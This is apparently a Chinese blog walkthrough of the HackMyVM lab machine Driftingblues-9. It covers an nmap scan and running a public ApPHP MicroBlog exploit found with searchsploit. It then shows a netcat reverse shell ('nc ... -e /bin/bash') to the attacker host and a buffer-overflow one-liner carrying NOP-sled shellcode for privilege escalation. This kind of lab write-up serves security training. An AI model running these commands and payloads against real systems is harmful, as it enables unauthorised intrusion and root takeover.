当前位置:   article > 正文

Hackmyvm综合靶机 | Driftingblues-9(完结)_web综合靶机

web综合靶机

前言提要

终于把这个系列的靶机打完了,后面会做一个小总结,近期暂时会把靶机练习放一段时间往其他知识点上去学习学习…
老实说感觉自己打了这一段的时间的靶机了,每次都会有新的问题也会get新的知识,究于还是自己的深度没有到一定位置,我的前路还有一篇宝藏等着我去挖掘!!!!
比如这个靶机其实十分简单但我不会缓冲区溢出(后续会去了解…)

kali:192.168.132.139

靶机IP:192.168.132.178

信息收集

nmap -A -sV -p- -T4 192.168.132.178
  • 1

image-20220414213555562

web页面有一个后台管理员登陆口

This script was generated by ApPHP MicroBlog v.1.0.1
  • 1

搜索一下相关漏洞

searchsploit ApPHP MicroBlog 1.0.1
searchsploit -m 33070.py
cat 33070.py
  • 1
  • 2
  • 3

image-20220414215754558

python2 33070.py http://192.168.132.178/index.php 
  • 1

发现一处账号密码,反弹shell试试、

kali:rlwrap nc -lvnp 1234
nc 192.168.132.139 1234 -e /bin/bash
  • 1
  • 2

发现有 clapton 用户,和数据库中的用户一样,尝试登录一下 clapton 用户

image-20220414220437850

提示缓冲区溢出,并给出俩个案例

https://www.tenouk.com/Bufferoverflowc/Bufferoverflow6.html
https://samsclass.info/127/proj/lbuf1.htm
  • 1
  • 2

缓冲区溢出提权(我不会)

这里带师傅链接:https://www.cnblogs.com/sainet/p/15789449.html

for i in {1..10000}; do (./input $(python -c 'print("A" * 171 + "\xe0\x13\x8b\xbf" + "\x90"* 1000 + "\x31\xc9\xf7\xe1\x51\xbf\xd0\xd0\x8c\x97\xbe\xd0\x9d\x96\x91\xf7\xd7\xf7\xd6\x57\x56\x89\xe3\xb0\x0b\xcd\x80")')); done
  • 1

image-20220414220834679

本文内容由网友自发贡献,转载请注明出处:https://www.wpsshop.cn/w/你好赵伟/article/detail/210616
推荐阅读
相关标签
  

闽ICP备14008679号